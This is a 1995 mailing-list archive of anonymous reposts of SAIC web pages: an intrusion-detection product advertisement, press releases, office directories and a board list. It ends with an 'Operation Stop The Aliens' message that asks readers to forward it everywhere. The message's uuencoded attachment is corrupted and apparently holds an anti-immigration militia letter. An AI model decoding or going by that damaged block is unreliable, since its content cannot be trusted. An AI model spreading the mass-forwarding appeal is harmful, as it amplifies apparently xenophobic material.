          The right to download and store or output this 
information is
          granted to users for their personal use only. Any 
other
          reproduction, by any means mechanical or electronic, 
without
          the express written permission of Science 
Applications
          International Corp. is strictly prohibited. (C) 
Copyright,
          1995, SAIC. All rights reserved. 
            
__________________________________________________________
          
          Copyright SAIC Home
            
__________________________________________________________
          
    Last updated on 07-10-95







From anonymous at freezone.remailer  Sat Sep 30 04:09:16 1995
From: anonymous at freezone.remailer (anonymous at freezone.remailer)
Date: Sat, 30 Sep 95 04:09:16 PDT
Subject: Computer Misuse Detection System
Message-ID: <199509301109.HAA21436@light.lightlink.com>


URL: http://www.saic.com/products/cmds/index.html


   *** Products and Services ***
     
_________________________________________________________________

   
                       COMPUTER MISUSE DETECTION SYSTEM
                                       
                [CMDS]
                
   Caught in the Act
          Until now, computer misuse could not be detected 
until after
          the damage was done. With CMDS, the system alerts you 
to
          suspicious computer activity as it takes place so you 
can react
          immediately.
          
   Round the Clock Security
          CMDS never sleeps. Computer misuse characteristically 
takes
          place at times when you are not expecting it. If an 
intruder
          rattles your door knob at 2:00 AM, CMDS is there to 
watch the
          shop.
          
   Make the Intruders Think Twice
          Knowing that security software of this type is 
installed will
          give the potential misusers reason to reconsider 
their actions.
          CMDS affects the intruder's motivations by 
threatening them
          with unseen protection. Like police radar, they won't 
know it's
          there until they've been caught!
          
   Security Through Pictures
          If a picture is worth a thousand words and then CMDS 
speaks
          volumes about the security status of your network. 
The security
          trending reports show you, graphically, all the 
information you
          need to identify the intruders.
          
   Off-the-Rack or Tailor Made
          A well made suit off-the-rack can meet the needs of 
most people
          at tremendous cost savings. However, a tailor-made 
suit may be
          necessary when the person in need has special 
requirements.
          SAIC can tailor a system using CMDS core technology 
to meet any
          large heterogeneous network or detection 
requirements.
          
   Increase Efficiency While Reducing Cost, Time Spent, and 
Losses
          CMDS will increase efficiency of your security 
operations by
          performing faster than a manual review process. Your 
security
          staff will be freed up for other activities reducing 
your
          overall cost. Your losses will decrease through the 
deterrence
          and detection capabilities of CMDS.
          
   
     
_________________________________________________________________

   
More About CMDS...

          o Detecting Computer Crime
          o Product Description
          o Designed to Detect
          o Detection Capabilities
          o System Requirements
          o Licensing and More Information
          
   
     
_________________________________________________________________

   
Intrusion Detection Research Papers

          Audit Reduction and Misuse Detection in Heterogeneous
          Environments: Framework and Application.
          Click here to download Macintosh Microsoft Word 5.1 
file
          (464K).
          
   
     
_________________________________________________________________

   
   Copyright SAIC Home
     
_________________________________________________________________

   
    Last updated on 07-10-95







From anonymous at freezone.remailer  Sat Sep 30 04:13:37 1995
From: anonymous at freezone.remailer (anonymous at freezone.remailer)
Date: Sat, 30 Sep 95 04:13:37 PDT
Subject: SAIC Acquires Network Solutions
Message-ID: <199509301113.HAA21552@light.lightlink.com>


URL: http://www.saic.com/corporate/news/news03-15-95.html


   *** About SAIC ***
  
     
_________________________________________________________________

   
   SAIC ACQUIRES NETWORK SOLUTIONS, INC.
   
   (MCLEAN, VA) March 15, 1995 -- Science Applications 
International
   Corporation (SAIC) has acquired Network Solutions, Inc., a 
world
   leader in networking technology and applications.
   
   Network Solutions, Inc. is headquartered in Herndon, 
Virginia and will
   become a wholly owned subsidiary of SAIC. Terms of the 
acquisition
   were not disclosed.
   
   Network Solutions, Inc. was established in 1979 and has 
major clients
   in the federal government market, state and local market, 
and
   commercial market. Network Solutions, Inc. manages the 
worldwide
   registration services for the Internet and has significant 
expertise
   in local and wide area interoperability technologies. 
Network
   Solutions, Inc. currently supports two major Network 
Information
   Centers: The InterNIC and the Defense Data Network NIC.
   
   "The addition of Network Solutions, Inc. to SAIC brings a 
world-class
   networking business into our growing complex of 
communications and
   computing capability," said Dr. J. Robert Beyster, founder, 
chairman
   and chief executive officer of SAIC. "We see growth in this 
market
   segment as unlimited for us in the future."
   
   "We are extremely pleased to have Network Solutions, Inc. 
joining one
   of the most dynamic and successful growth firms in the 
world," said
   Emmit J. McHenry, chief executive officer of Network 
Solutions, Inc.
   "We anticipate explosive growth as we combine our networking 
expertise
   and experience with SAIC, a recognized leader in information
   technology and systems integration. The size and scope of 
SAIC will
   allow us to deliver our recognized excellence to a worldwide 
market."
   
   "The acquisition of Network Solutions, Inc. is the key next 
step in
   our strategy of building a full spectrum, full service 
global
   information technology business," said Michael A. Daniels, 
senior vice
   president and general manager of the Technology Applications 
Sector of
   SAIC. "We now work with clients on major engagements in the 
federal
   government market, the commercial market, and the state and 
local
   government market in both the United States and overseas. 
With the
   acquisition of Network Solutions, Inc. we complete the 
technology
   offering of our Systems and Network Integration line of 
business."
   
   SAIC is the largest employee-owned, high technology services 
and
   products company based in the United States. SAIC has annual 
revenues
   of $1.9billion, 20,000 employees and over 300 office 
locations around
   the world. High technology services and products are focused 
in the
   core lines of business of information technology, systems 
integration,
   energy, environment, medical and health care systems and
   transportation. Founded in 1969, SAIC has completed its 26th
   consecutive year of record revenue and earnings.
   
   
     
_________________________________________________________________

   
   Copyright SAIC Home
     
_________________________________________________________________

   
    Last updated on 07-05-95







From anonymous at freezone.remailer  Sat Sep 30 04:16:25 1995
From: anonymous at freezone.remailer (anonymous at freezone.remailer)
Date: Sat, 30 Sep 95 04:16:25 PDT
Subject: SAIC Shows Crime-Fighting Technology
Message-ID: <199509301116.HAA21636@light.lightlink.com>


URL: http://www.saic.com/corporate/news/news03-17-95.html


   *** About SAIC ***
   
     
_________________________________________________________________

   
   SAIC SHOWS CRIME-FIGHTING TECHNOLOGY
   
   (SAN DIEGO, CA) March 17, 1995 -- Illegal contraband hidden 
in trucks,
   boats and airplanes can be detected with the assistance of
   state-of-the-art technology developed by Science 
Applications
   International Corporation (SAIC).
   
    The portable system is being demonstrated Friday as part of 
the
   opening of the federal Border Research and Technology Center 
at the
   Otay Mesa port-of-entry. The center, which has been 
established
   through the efforts of San Diego U.S. Attorney Alan D. 
Bersin, will be
   the focal point for driving the design, development, 
manufacture and
   acquisition of specialized law-enforcement technologies. The 
center is
   expected to identify specific programs for development that 
could be
   used by a variety of law-enforcement agencies.
   
   Various technologies for fighting cross-border crime will be
   demonstrated during a mock Otay border crossing by a driver 
attempting
   to evade the law.
   
   San Diego-based SAIC's portable contraband detection system 
scans
   inaccessible areas such as wheel wells, bumpers, boat hulls 
and
   aircraft fuselages. The system uses a micro-processor, a
   self-contained low-level radioactive sources and a sensitive 
detector.
   As surfaces are scanned, concealed objects including 
weapons,
   narcotics, alcohol and explosives reflect the radiation, 
which is
   sensed by the detector.
   
   The system operator is alerted by both a backlit digital 
display,
   visible in all light conditions, and an audio beeper that 
increases in
   rate as the contraband is detected. The handheld system's 
total weight
   is about two pounds.
   
   SAIC also will show how vehicles can be "tagged" by radio 
transponders
   which can provide positive identification of cars, trucks or 
trains
   passing through a specific area. Already in use by several
   SAIC-equipped automated toll collection systems across the 
U.S, the
   transponders or "tags" are issued to specific vehicles. 
Attached to
   bumpers or placed on dashboards, the tags are read as the 
vehicle
   passes near an antenna installed over or at the side of the 
roadway.
   The signal is displayed on a computer screen, and the data 
is stored
   and available for further use.
   
   The system could be used to speed commuters or other 
law-abiding
   vehicles regularly crossing the border. Violators can be 
caught
   because the "smart" system senses when a vehicle crosses 
without a
   tag, and can trigger alarms, crossing gates or other 
barriers, as well
   as recording the violator on video tape. Operators can 
electronically
   enhance license plate photos to be read clearly and process
   enforcement action.
   
   "We at SAIC are encouraged by the opening of the Border 
Research
   Technology Center today. This Center will provide the 
opportunity to
   apply high-technology solutions in support of increased 
trade as a
   result of NAFTA as well as support national law enforcement 
efforts at
   the border," said Dr. Donald M. Kerr, executive corporate 
vice
   president of SAIC.
   
   SAIC also provides other vehicle tracking systems that can 
trace the
   movements of railroad cars and detect motorists who evade 
barriers
   such as railroad grade crossings. The high-technology 
company also has
   developed methods of tracing small motorized boats, 
submersibles and
   even swimmers crossing strategic waterways, as well as other 
imaging
   applications.
   
   SAIC provides services and products to government and the 
private
   sector in the areas of law enforcement, transportation, 
energy,
   environment, health care and systems integration. With 
annual revenues
   of $1.9 billion, the company and its subsidiaries have 
nearly 20,000
   employees and more than 300 locations worldwide.
   
   
     
_________________________________________________________________

   
   Copyright SAIC Home
     
_________________________________________________________________

   
    Last updated on 07-05-95







From anonymous at freezone.remailer  Sat Sep 30 04:19:06 1995
From: anonymous at freezone.remailer (anonymous at freezone.remailer)
Date: Sat, 30 Sep 95 04:19:06 PDT
Subject: SAIC's FBI ID System
Message-ID: <199509301118.HAA21682@light.lightlink.com>


URL: http://www.saic.com/corporate/news/news8-23-94.html


   *** About SAIC ***
   
     
_________________________________________________________________

   
   SAIC TEAM TO DEVELOP MULTIMILLION-DOLLAR
   FBI IDENTIFICATION SYSTEM
   
   (MCLEAN, VA,) August 23, 1994 -- SAIC (Science Applications
   International Corporation) has won a major contract to 
design and
   develop the FBI's Interstate Identification Index computer 
system.
   This system is an on-line criminal history database which 
will support
   federal, state, and local law enforcement agencies via the 
National
   Crime Information Center network.
   
   Under the 8-year contract, the SAIC team will design, 
implement, and
   provide operations and maintenance support for the 
Interstate
   Identification Index. The contract has an estimated value of 
$27.6
   million.
   
   "The Interstate Identification Index project contributes to 
our
   company's goals to provide quality technical products and 
services for
   the security and well-being of our nation," said SAIC 
Project Manager
   Shelley Parker. "SAIC has been working for the FBI in this 
area for
   the last 10 years. Our expertise and personal commitment to 
this
   program made it particularly important to the company."
   
   Development and integration work will be performed in SAIC's 
Software
   and System Integration Group in the McLean, VA facility by a 
team of
   engineers who have worked for many years on this 
application. The team
   will be augmented by new staff members with specialized 
expertise for
   the new system.
   
   SAIC provides innovative services and products to government 
and the
   private sector in the areas of systems integration, energy,
   environment and transportation. The company, which is the 
largest
   employee-owned high-technology firm in the nation, has 
annual revenues
   of $1.67 billion and 16,000 employees in more than 250 
locations
   worldwide.
   
   
     
_________________________________________________________________

   
   Copyright SAIC Home
     
_________________________________________________________________

   
    Last updated on 07-05-95







From anonymous at freezone.remailer  Sat Sep 30 04:33:30 1995
From: anonymous at freezone.remailer (anonymous at freezone.remailer)
Date: Sat, 30 Sep 95 04:33:30 PDT
Subject: SAIC in VA
Message-ID: <199509301133.HAA22001@light.lightlink.com>


URL: http://www.saic.com/business/locations/va.html


   **** Business Directory ****
     
_________________________________________________________________

   
                               SAIC IN VIRGINIA
                                       
     * Alexandria
          + Alexandria/Eisenhower Ave. (Loc. 238)
          + Alexandria/DMSO (Loc. 692)
          + Alexandria/DTG (Loc. 691)
          + Alexandria/JHK (Loc. 801)
          + Alexandria/MARITIME SERV DIV (Loc. 365)
          + Alexandria/TSC (Loc. 694)
          + Washington D.C./AMSEC (Loc.347)
     * Arlington
          + Arlington/Jefferson Davis HWY (Loc. 294)
          + Arlington/AMSEC (Loc. 678)
          + Arlington/BALLSTON (Loc. 765)
          + Arlington/CAPS (Loc. 785)
          + Arlington/CM (Loc. 573)
          + Arlington/CON. SUP. Facility (Loc. 964)
          + Arlington/CSI ADV. APP. DIV. (Loc. 963)
          + Arlington/CSM & AT (Loc. 402)
          + Arlington/CSS (Loc. 309)
          + Arlington/FSD (Loc. 784)
          + Arlington/ICITAP (Loc. 769)
          + Arlington/LEO (Loc. 587)
          + Arlington/MOSES (Loc. 612)
          + Arlington/RDO (Loc. 783)
          + Arlington/SAI T (Loc. 329)
          + Arlington/SCT (Loc. 830)
          + Arlington/SEM (Loc. 711)
          + Arlington/SIM. TECH (Loc. 717)
          + Arlington/SIM. TECH (Loc. 990)
          + Arlington/TRG (Loc. 539)
          + Arlington/TRG (Loc. 668)
          + Arlington/TTG (Loc. 708)
          + Crystal City (Loc. 508)
          + Virginia Square/ATG (Loc. 215)
     * Dahlgren
          + Dahlgren/Danube Drive (Loc. 226)
          + Dahlgren/AMSEC (Loc. 716)
     * Chantilly
          + Chantilly/NSI (Loc. 944)
     * Falls Church
          + Falls Church/EHSG (Loc. 052)
          + Falls Church/HCTG (Loc. 456)
          + Falls Church/SKYLINE/TAG (Loc. 284)
     * Ft. Belvoir
          + Ft. Belvoir (Loc. 709)
     * Hampton
          + Hampton/Enterprise Parkway (Loc. 761)
          + Hampton/Enterprise Parkway (Loc. 833)
          + Hampton/Enterprise Parkway (Loc. 256)
          + Hampton/Command & Control (Loc. 550)
          + Hampton/NASA LANGLEY (Loc. 618)
     * Herndon
          + Herndon/TAG (Loc. 946)
     * King George
          + King George/NAVSWC (Loc. 924)
     * Lynchburg
          + Lynchburg/Timberlake Road (Loc. 212)
     * McLean
          + McLean (Loc. 049)
          + McLean/COMSYSTEMS (Loc. 092)
          + McLean/ENTERPRISE CENTER (Loc. 747)
          + McLean/TE&A (Loc. 741)
          + McLean/TOWER (Loc. 015)
     * Newington
          + Newington/CVR (Loc. 474)
     * Norfolk
          + Norfolk/Plume Street (Loc. 441)
          + Norfolk/RE WRIGHT (Loc. 931)
     * Petersburg
          + Petersburg/NSSSG (Loc. 638)
     * Portsmouth
          + Tidewater/CHCS (Loc. 649)
     * Reston
          + Reston/EITS (Loc. 641)
     * Richmond
          + Richmond/NSI (Loc. 951)
     * Virginia Beach
          + Virginia Beach/SEG (Loc. 282)
          + Corp Office/AMSEC (Loc. 346)
            
   
     
_________________________________________________________________

   
   Copyright SAIC Home
     
_________________________________________________________________

   
    Last updated on 09-07-95







From anonymous at freezone.remailer  Sat Sep 30 04:35:27 1995
From: anonymous at freezone.remailer (anonymous at freezone.remailer)
Date: Sat, 30 Sep 95 04:35:27 PDT
Subject: SAIC in MD
Message-ID: <199509301135.HAA22051@light.lightlink.com>


URL: http://www.saic.com/business/locations/md.html


   **** Business Directory ****
     
_________________________________________________________________

   
                               SAIC IN MARYLAND
                                       
     * Abingdon
          + Abingdon/Continental Drive (Loc. 591)
     * Annapolis
          + Annapolis/TRG (Loc. 178)
          + Annapolis/WOR (Loc. 241)
     * Baltimore
          + Baltimore/White Marsh (Loc. 221)
     * Bethesda
          + Bethesda/CHCS (Loc. 498)
     * California
          + California/SCT (Loc. 827)
     * Columbia
          + Columbia/Ideas Group (Loc. 905)
          + Columbia/MSO (Loc. 473)
          + Columbia/SSIG (Loc. 315)
     * Fort Ritchie
          + Ft. Ritchie (Loc. 700)
     * Frederick
          + Frederick (Loc. 519)
          + Frederick/FCRDC (Loc. 970)
          + Frederick/PAI (Loc. 512)
          + Frederick/PAI Amin. Office (Loc. 575)
          + Frederick/Spectrum Drive (Loc. 750)
     * Gaithersburg
          + Gaithersburg/Professional Drive (Loc. 134)
          + Gaithersburg/QUINCE DIAMOND (Loc. 725)
          + Gaithersburg/UTILITY SVCS (Loc. 555)
     * Germantown
          + Germantown/Century Blvd. (Loc. 292)
          + Germantown/BELLEMEADE III (Loc. 854)
     * Hagerstown
          + Hagerstown/DTG (Loc. 652)
     * Hanover
          + Hanover/Ashton Road (Loc. 745)
     * Joppatowne
          + Joppatowne/SAIC (Loc. 220)
          + Joppatowne/TDG (Loc. 303)
     * Lanham
          + Maryland/SYNTONIC (Loc. 860)
     * Laurel
          + Laurel/GSC (Loc. 661)
     * Rockville
          + Rockville/ NSI (Loc. 953)
     * Silver Spring
          + Silver Spring/ADELPHI (Loc. 908)
          + Silver Spring/WHITE OAK (Loc. 563)
     * Towson
          + Towson/JHK (Loc. 803)
     * Westminister
          + Westminister/RE WRIGHT (Loc. 930)
            
   
     
_________________________________________________________________

   
   Copyright SAIC Home
     
_________________________________________________________________

   
    Last updated on 09-07-95







From anonymous at freezone.remailer  Sat Sep 30 04:44:17 1995
From: anonymous at freezone.remailer (anonymous at freezone.remailer)
Date: Sat, 30 Sep 95 04:44:17 PDT
Subject: SAIC Global Web
Message-ID: <199509301144.HAA22231@light.lightlink.com>


URL: http://www.saic.com/business/locations/index.html


   *** Business Directory ***
     
_________________________________________________________________

   
U.S. Locations Alphabetical List

 o Alabama         o Illinois        o Nebraska        o Rhode 
Island
 o Alaska          o Indiana         o Nevada          o South 
Carolina
 o Arizona         o Kansas          o New Hampshire   o South 
Dakota
 o Arkansas        o Kentucky        o New Jersey      o 
Tennessee
 o California      o Louisiana       o New Mexico      o Texas
 o Colorado        o Maryland        o New York        o Utah
 o Connecticut     o Massachusetts   o North Carolina  o 
Virginia
 o Delaware        o Michigan        o North Dakota    o 
Washington
 o Florida         o Minnesota       o Ohio            o 
Washington D.C.
 o Georgia         o Mississippi     o Oklahoma        o West 
Virginia
 o Hawaii          o Missouri        o Oregon          o 
Wisconsin
 o Idaho           o Montana         o Pennsylvania    o 
Wyoming

     
_________________________________________________________________

   
    Last updated on 07-05-95

----------


URL: http://www.saic.com/business/locations/others.html


   *** Business Directory ***
     
_________________________________________________________________

   
International Locations Alphabetical List

  CANADA
     * Halifax
     * Montreal
     * Ottawa
     * Vancouver
       
  COLOMBIA
  
     * Colombia, LTDA.
       
  FRANCE
  
     * Paris La Defense/EUROPE (Loc. 596)
       
  GERMANY
  
     * Germany
     * Kaiserslautern/SCT (Loc. 826)
     * Landstuhl/CHCS
       
  HONG KONG

     * Hong Kong (Loc. 789)
       
  ICELAND

     * Keflavik/CHCS
       
  MEXICO

     * Mexico City
       
  RUSSIA

     * Moscow/MIR (Loc. 764)
       
  SPAIN

     * IBERSAIC (Loc. 693)
       
  UNITED KINGDOM

     * Aberdeen (Loc. 797)
     * Aberdeen/SAIC Ltd (Loc. 728)
     * Birmingham
     * Camberly UK/SAIT (Loc. 666)
     * Cambridge/TOP EXPRESS (Loc. 340)
     * IBM SAIC (Loc. 667)
     * London/Andrew Palmer (Loc. 798)
     * Meriden (Loc. 865)
     * Stockley Park (Loc. 884)
       
  
     
_________________________________________________________________

   
    Last updated on 07-05-95







From anonymous at freezone.remailer  Sat Sep 30 04:47:48 1995
From: anonymous at freezone.remailer (anonymous at freezone.remailer)
Date: Sat, 30 Sep 95 04:47:48 PDT
Subject: SAIC in CA
Message-ID: <199509301147.HAA23372@light.lightlink.com>


URL: http://www.saic.com/business/locations/ca.html


   **** Business Directory ****
     
_________________________________________________________________

   
                              SAIC IN CALIFORNIA
                                       
     * Anaheim
          + Anaheim/JHK (Loc. 807)
     * APO AP
          + Guam/Naval Hospital/CHCS (Loc. 984)
          + Japan/ETG (Loc. 427)
          + Japan/Misawa AB/CHCS (Loc. 987)
          + Japan/Okinawa/USNH/CHCS (Loc. 986)
          + Japan/Yokosuka/CHCS (Loc. 601)
          + Japan/Yokota AB/CHCS (Loc. 988)
          + Korea/COMSYS (Loc. 740)
          + Korea/ETG (Loc. 426)
          + Korea/Kunsan AB/CHCS (Loc. 576)
          + Korea/Osan AB/CHCS (Loc. 985)
     * Burlingame
          + Burlingame/EPRI (Loc.721)
     * Camarillo
          + Camarillo/Camino Ruiz (Loc. 161)
     * Camp Pendleton
          + Camp Pendleton/CHCS (Loc. 818)
     * Cardiff
          + Cardiff/ATLAS (Loc. 790)
     * Citrus Heights
          + Citrus Heights/NSI (Loc. 956)
     * Corona
          + Corona/AMSEC (Loc. 262)
     * Cupertino
          + Cupertino/Baywood Drive (Loc. 636)
     * Edwards AFB
          + Edwards AFB/CHCS (Loc. 883)
     * El Segundo
          + El Segundo/ASP (Loc. 328)
     * Emeryville
          + Emeryville/Berkeley/DTG (Loc. 251)
          + Emeryville/JHK (Loc. 804)
     * Fort Irwin
          + Fort Irwin/CHCS (Loc. 782)
     * Fountain Valley
          +
          + Fountain Valley/MSO (Loc. 57)
     * Goleta
          + Goleta/MARIPRO (Loc. 182)
     * Laguna Hills
          + Laguna Hills/DTG (Loc.331)
     * La Jolla
          + La Jolla/Cave Street (Loc. 450)
          + La Jolla/1200 Prospect (Loc. 626)
          + La Jolla/1299 Prospect (Loc. 544)
          + La Jolla/ITER (Loc. 623)
     * Lancaster
          + Lancaster (Loc. 938)
     * Lawndale
          + Lawndale/SCT (Loc. 823)
     * Lemoore
          + Lemoore/CHCS (Loc. 781)
     * Los Altos
          + Los Altos/El Camino Real (Loc. 008)
     * Los Angeles
          + Los Angeles AFB/CHCS (Loc. 885)
          + Los Angeles/Century City (Loc. 124)
          + Los Angeles/UCLA/Div. 284 (Loc. 605)
     * McClellan
          + McClellan AFB/TTG (Loc. 787)
     * Moffett Field
          + Moffett Field (Loc. 834)
          + Moffett Field (Loc. 920)
          + Moffett Field (Loc. 922)
     * Monterey
          + Monterey/Camino El Estero (Loc. 098)
     * Oxnard
          + Oxnard/AMSEC (Loc. 159)
     * Palo Alto
          + Palo Alto/SCT (Loc. 829)
     * Pasadena
          + Pasadena/JHK (Loc. 805)
     * Pleasanton
          + Pleasanton/Hopyard Road (Loc. 029)
     * Poway
          + Poway (Loc. 962)
   
     * Pt. Hueneme
          + Pt. Hueneme/CHCS (Loc. 841)
     * Ridgecrest
          + Ridgecrest/STG (Loc. 336)
     * Riverside
          + Riverside/JHK (Loc. 810)
          + Riverside/NSI (Loc. 955)
     * San Bernardino
          + San Bernardino/NSI (Loc. 945)
     * Sacramento
          + Sacramento/LEO (Loc. 580)
     * San Diego
          + San Diego/AMSEC (Loc. 348)
          + San Diego/Campus Pt. A (Loc. 245)
          + San Diego/Campus Pt. C(Loc. 001)
          + San Diego/Campus Pt. D
   (Loc. 094)
     * San Diego/Campus Pt. E (Loc. 461)
     * San Diego/Campus Pt. F (Lco. 399)
     * San Diego/Campus Pt. G (Loc. 599)
     * San Diego/Campus Pt. K (Loc. 548)
     * San Diego/CHCS (Loc. 703)
     * San Diego/ESG (Loc. 973)
     * San Diego/Fourwinds (Loc. 312)
     * San Diego/MARITIME SERV DIV (Loc. 363)
     * San Diego/MEG (Loc. 677)
     * San Diego/MTO (Loc. 408)
     * San Diego/Old Town (Loc. 552)
     * San Diego/SAIC (Loc. 218)
     * San Diego/SAI T/Camus Pt. B (Loc. 291)
     * San Diego/SAI T/STPG (Loc. 358)
     * San Diego/SCRIPPS (Loc. 869)
     * San Diego/SED(668)/FCTCPAC (Loc. 673)
     * San Diego/SEG (Loc. 332)
     * San Diego/Wateridge (Loc. 021)
     * Sorrento Valley/(CSG) MANUFACTURING (Loc. 553)
     * Sorrento Valley/REC RES RET (Loc. 413)
     * Sorrento Valley/REMOTE SYS FAC (Loc. 337)
     * Sorrento Valley/SAI T (Loc. 002)
     * Sorrento Valley/SEA (Loc. 676)
       
   San Francisco
     * San Francisco/JDA (Loc. 933)
     * San Francisco/TSC (Loc. 457)
       
   San Jose
     * San Jose/C&I (Loc. 333)
       
   Santa Barbara
     * Santa Barbara/Ekwill Street (Loc. 216)
     * Santa Barbara/State Street (Loc. 786)
     * Santa Barbara/CSG (Loc. 431)
     * Santa Barbara/PSG (Loc. 439)
       
   Santa Clara
     * Santa Clara/Patrick Henry Drive (Loc. 007)
       
   Santa Ynez
     * Santa Ynez/Sagunto Street (Loc. 420)
       
   Thousand Oaks
     * Thousand Oaks/DTG (Loc. 730)
       
   Torrance
     * Torrance/Western Avenue (Loc. 005)
       
   Travis AFB
     * David Grant USAF MED CTR/CHCS (Loc. 671)
       
   Vallejo
     * Vallejo/COMSYS (Loc. 243)
     * Vandenberg AFB (Loc. 598)
     * Vandenberg AFB/CHCS (Loc. 882)
       
   Walnut Creek
     * Walnut Creek/HCTG (Loc. 518)
       
   Woodland Hills
     * Woodland Hills/JHK (Loc. 811)
       
   
     
_________________________________________________________________

   
   Copyright SAIC Home
     
_________________________________________________________________

   
    Last updated on 09-07-95







From anonymous at freezone.remailer  Sat Sep 30 04:51:14 1995
From: anonymous at freezone.remailer (anonymous at freezone.remailer)
Date: Sat, 30 Sep 95 04:51:14 PDT
Subject: SAIC Directors
Message-ID: <199509301151.HAA23472@light.lightlink.com>


URL:
http://www.saic.com/corporate/annual-reports/1995/directors.html


   Board of Directors
     
_________________________________________________________________

   
   [IMAGE] J.R. Beyster
   Chairman of the Board and
   Chief Executive Officer, SAIC

   [IMAGE] L.A. Kull
   President and Chief Operating
   Officer, SAIC

   [IMAGE] A.L. Alm
   Sector Vice President, SAIC

   [IMAGE] V.N. Cook
   Chairman, Visions
   International, Inc.

   [IMAGE] S.J. Dalich
   Executive Vice President, SAIC

   [IMAGE] C.K. Davis
   International Health Care
   Consultant

   [IMAGE] W.H. Demisch
   Managing Director, BT
   Securities Corp.

   [IMAGE] E.A. Frieman
   Director, Scripps Institution of
   Oceanography; Vice Chancellor
   of Marine Sciences, UCSD

   [IMAGE] J.E. Glancy
   Corporate Executive Vice
   President, SAIC

   [IMAGE] F. Herwood
   SAIC Director Emeritus

   [IMAGE] D.A. Hicks
   Chairman, Hicks & Associates,
   a subsidiary of SAIC

   [IMAGE] B.R. Inman
   Admiral, USN (Ret.)

   [IMAGE] D.M. Kerr
   Corporate Executive Vice
   President, SAIC

   [IMAGE] M.R. Laird
   Senior Counselor, National
   and International Affairs, The
   Readers Digest Association Inc.

   [IMAGE] W.M. Layson
   Senior Vice President, SAIC

   [IMAGE] C.B. Malone
   President, Financial & Management Consulting Inc.

   [IMAGE] J.W. McRary
   President and Chief Executive
   Officer, Microelectronics and
   Computer Technology Corp.

   [IMAGE] B.J. Shillito
   SAIC Director Emeritus

   [IMAGE] E.A. Straker
   Executive Vice President, SAIC

   [IMAGE] M.R. Thurman
   General, USA (Ret.)

   [IMAGE] M.E. Trout
   Chairman Emeritus,
   American Healthcare Systems

   [IMAGE] J.H. Warner, Jr.
   Executive Vice President,
   SAIC

   [IMAGE] J.A. Welch
   General, USAF (Ret.)

   [IMAGE] J.B. Wiesler
   Vice Chairman, Bank of
   America (Ret.)

   [IMAGE] W.E. Zisch
   SAIC Director Emeritus
     
_________________________________________________________________

   
   Table of Contents More
     
_________________________________________________________________








From anonymous at freezone.remailer  Sat Sep 30 05:00:40 1995
From: anonymous at freezone.remailer (anonymous at freezone.remailer)
Date: Sat, 30 Sep 95 05:00:40 PDT
Subject: SAIC in DC
Message-ID: <199509301200.IAA23661@light.lightlink.com>


URL: http://www.saic.com/business/locations/dc.html


   **** Business Directory ****
     
_________________________________________________________________

   
                            SAIC IN WASHINGTON D.C.
                                       
     * P.O.S.T. (Loc. 126)
     * Walter Reed/CHCS (Loc. 497)
     * Walter Reed/GOV'T AFFAIRS (Loc. 235)
     * Washington D.C./SEASG (Loc. 288)
     * Washington D.C/CHEMONICS XPT (Loc. 821)
     * Washington D.C/ITG (Loc. 704)
     * Washington D.C./NSI (Loc. 969)
     * Washington D.C./OCRW (Loc. 482)
     * Washington D.C/QATSS HQ (Loc. 729)
     * Washington D.C./TCI (Loc. 991)
       
   
     
_________________________________________________________________

   
   Copyright SAIC Home
     
_________________________________________________________________

   
    Last updated on 07-06-95







From ASICEO at internetMCI.COM  Sat Sep 30 07:22:21 1995
From: ASICEO at internetMCI.COM (FELIX R. WILSON SR.)
Date: Sat, 30 Sep 95 07:22:21 PDT
Subject: Operation Stop The Aliens
Message-ID: <01HVVTH9ORWY8ZEKWD@MAILSRV1.PCY.MCI.NET>


-- [ From: FELIX R. WILSON SR. * EMC.Ver #2.3 ] --
 Attachment: natltr.txt Code: 00H7GFL   \ Created: 09-29-95, 06:21 PM [34 Kb]

The Attached File Is For Viewing It I In Text Format Please Forward To
Everyone on the net work. and post to every board " Please.." 
//BEGIN BINARY MAIL SEGMENT:
begin 644 natltr.txt
M("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@
M("`@("`@("!&65R2!A;&P at 9VQO2P at 1F%T:&5R+"!3;VX at 86YD($AO;'D at 1VAO2!N:6=H="X@($Y!0TTO3D%54TTL
M(&]R(&%N>2!A9F9I;&EA=&5S+"!$3R!.3U0@2!#;VYS=&ET=71E9"!';W9E2X@(%1H92`@8W)I65A0T*("`@("`@("`@("`@("`@("!T:&4 at 9G)A;65W;W)K(&MN
M;W=N(&%S('1H92!#;VYS=&ET=71I;VXL(&AA2!P7-T96T@(&]F("!G;W9E2`@=&AA
M=`T*("`@("`@("`@("`@("`@("!O9F9I8V4L('1H870 at 26QL96=A;"!);6UI
M9W)A=&EO;B!A;F0 at 5')A9F9I8VMI;F<@:6X at 26QL96=A;"!$6]U(&UA>2!T:&EN
M:R!T:&ES('-O=6YD2`H86YD('!O:7-O;FEN9R!C=7(@(&-H:6QD&EC;R!A;F0@=&AE(%5N:71E9"`@4W1A
M=&5S("!E=F5R>2`@2!I6EN
M9R!I;B!T:&4@0T*("`@("`@("`@("`@("`@("`@)VAA0T*("`@("`@("`@("`@("`@("`@("`@('=O=6QD(&)R:6YG
M(&%B;W5T(&%N(&5C;VYO;6EC("!C;VQL87!S92`@:6X@($UE>&EC;RP@('=H
M:6-H("!I;B`@='5R;B`@=V]U;&0-"B`@("`@("`@("`@("`@("`@("`@("!B
M2!R:7-I;F<@=&ED92X@(%=E&EC86X-"@T*#"`@("`@
M("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@("`@
M("`@("`@1G)O;3H at 1&5A;B!#;VUP=&]N("`@("`@("`@("`@("`@("`@("`@
M("`@("`@.2\R.2\Y-2`@,38Z,#4Z-3(@(%!A9V4 at -2!O9B`Q, at T*3D%424].
M04P at 04Q,24%.0T4 at 3T8@0TA225-424%.($U)3$E424$-"@T*#0H-"@T*#0H-
M"@T*("`@("`@("`@("`@("`@("`@("!S=&%B:6QI='DN#0H-"B`@("`@("`@
M("`@("`@("`@("`@(D%N>2!A='1E;7!T('1O(&-L86UP(&1O=VX@;VX@:6UM
M:6=R871I;VX at 9G)O;2!T:&4@F5N6EN9R!H97)E(&ES('=E(&AA=F4@='=O(&-H;VEC97,N#0H@
M("`@("`@("`@("`@("`@($5I=&AE2!T;R!D969E;F0@=&AE(%-O=F5R96EG;@T*
M("`@("`@("`@("`@("`@("!";W)D97)S(&]F('1H92!5;FEO;B!F2X@(%=E(&AA
M=F4@=&AE(&)E'!A>6EN9R!#;W5N=')Y(&-A;B!B=7DN("!790T*("`@("`@("`@("`@("`@
